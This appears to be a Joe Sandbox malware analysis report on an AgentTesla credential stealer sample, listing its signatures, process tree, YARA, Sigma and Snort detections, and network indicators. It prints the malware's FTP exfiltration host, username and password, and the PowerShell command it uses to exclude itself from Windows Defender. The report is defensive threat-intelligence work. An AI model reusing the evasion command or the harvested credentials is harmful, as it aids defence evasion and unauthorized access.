Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi-.exe

Overview

General Information

Sample name:hesaphareketi-.exe
Analysis ID:1463495
MD5:c96c8178b1018515d4b43e614a3e3f15
SHA1:8a6601c7aff694ba0843e807a7a1a57bc3cb3665
SHA256:2ca8a08a83d98fbae1d8683cdb828b64216f9849ee539e09198db53876d419e9
Tags:AgentTeslaexegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hesaphareketi-.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C96C8178B1018515D4B43E614A3E3F15)
    • powershell.exe (PID: 6640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareketi-.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C96C8178B1018515D4B43E614A3E3F15)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.hesaphareketi-.exe.3666088.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.hesaphareketi-.exe.3666088.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.hesaphareketi-.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    4.2.hesaphareketi-.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      0.2.hesaphareketi-.exe.3666088.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 15 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 5740, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 6640, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 5740, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 6640, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 5740, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 6640, ProcessName: powershell.exe

                      Snort Signatures

                      Timestamp:06/27/24-09:19:54.944296
                      SID:2029927
                      Source Port:49703
                      Destination Port:21
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/27/24-09:19:55.631016
                      SID:2851779
                      Source Port:49706
                      Destination Port:53607
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/27/24-09:19:55.631016
                      SID:2855542
                      Source Port:49706
                      Destination Port:53607
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: hesaphareketi-.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://ftp.normagroup.com.trAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
                      Multi AV Scanner detection for domain / URL
                      Source: ftp.normagroup.com.trVirustotal: Detection: 10%Perma Link
                      Source: http://ftp.normagroup.com.trVirustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: hesaphareketi-.exeVirustotal: Detection: 36%Perma Link
                      Source: hesaphareketi-.exeReversingLabs: Detection: 39%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: hesaphareketi-.exeJoe Sandbox ML: detected
                      Source: hesaphareketi-.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: hesaphareketi-.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4x nop then jmp 0757E1A5h0_2_0757E2A5

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.7:49703 -> 104.247.165.99:21
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.7:49706 -> 104.247.165.99:53607
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49706 -> 104.247.165.99:53607
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 104.247.165.99 ports 51969,62952,57594,51081,62559,1,60734,2,52184,52196,54168,61079,53536,49465,53607,51869,21
                      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 104.247.165.99:53607
                      Source: Joe Sandbox ViewIP Address: 104.247.165.99 104.247.165.99
                      Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                      Source: unknownFTP traffic detected: 104.247.165.99:21 -> 192.168.2.7:49703 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: ftp.normagroup.com.tr
                      Source: hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.normagroup.com.tr
                      Source: hesaphareketi-.exe, 00000000.00000002.1238001511.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: hesaphareketi-.exe, 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, SKTzxzsJw.cs.Net Code: TFawXa
                      Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, SKTzxzsJw.cs.Net Code: TFawXa
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareketi-.exeJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_00DF83E00_2_00DF83E0
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_00DF73100_2_00DF7310
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_00DF84810_2_00DF8481
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_00DF6FE00_2_00DF6FE0
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_00DF72FE0_2_00DF72FE
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_00DF780B0_2_00DF780B
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0573ACA80_2_0573ACA8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_057325280_2_05732528
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_057325180_2_05732518
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0573058C0_2_0573058C
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0573AC980_2_0573AC98
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_05775CF80_2_05775CF8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_05775CE80_2_05775CE8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_075797900_2_07579790
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_075716170_2_07571617
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_075716280_2_07571628
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0757B4700_2_0757B470
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_075754090_2_07575409
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0757B4800_2_0757B480
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_075793580_2_07579358
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_075793480_2_07579348
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0757AF700_2_0757AF70
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0757AF600_2_0757AF60
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_07578F200_2_07578F20
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0A8C00400_2_0A8C0040
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0A8C1B300_2_0A8C1B30
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_00CF4A604_2_00CF4A60
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_00CF9BB04_2_00CF9BB0
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_00CF3E484_2_00CF3E48
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_00CFCF204_2_00CFCF20
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_00CF41904_2_00CF4190
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05EDBD184_2_05EDBD18
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05EDDC414_2_05EDDC41
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED3F584_2_05ED3F58
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED56E04_2_05ED56E0
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED2EF84_2_05ED2EF8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED00404_2_05ED0040
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED8B874_2_05ED8B87
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED9AE84_2_05ED9AE8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED363B4_2_05ED363B
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_05ED50004_2_05ED5000
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_060111224_2_06011122
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_060111284_2_06011128
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_0601F1B44_2_0601F1B4
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_067D42F84_2_067D42F8
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_067D9DA44_2_067D9DA4
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 4_2_00CFD2D84_2_00CFD2D8
                      Source: hesaphareketi-.exe, 00000000.00000002.1246725110.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000000.00000002.1238568331.00000000037F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000000.00000002.1238001511.000000000264C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000000.00000000.1212257269.00000000002C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevWuz.exeP vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000000.00000002.1249571927.0000000007A80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000000.00000002.1233843643.00000000007AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi-.exe
                      Source: hesaphareketi-.exe, 00000004.00000002.3677419170.0000000000AF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi-.exe
                      Source: hesaphareketi-.exeBinary or memory string: OriginalFilenamevWuz.exeP vs hesaphareketi-.exe
                      Source: hesaphareketi-.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: hesaphareketi-.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.hesaphareketi-.exe.39732d0.1.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.hesaphareketi-.exe.7a80000.6.raw.unpack, unLAPEVCHfvGUQoNgJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.hesaphareketi-.exe.39ef0f0.0.raw.unpack, apNwUAYQDNK2jjOBr5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
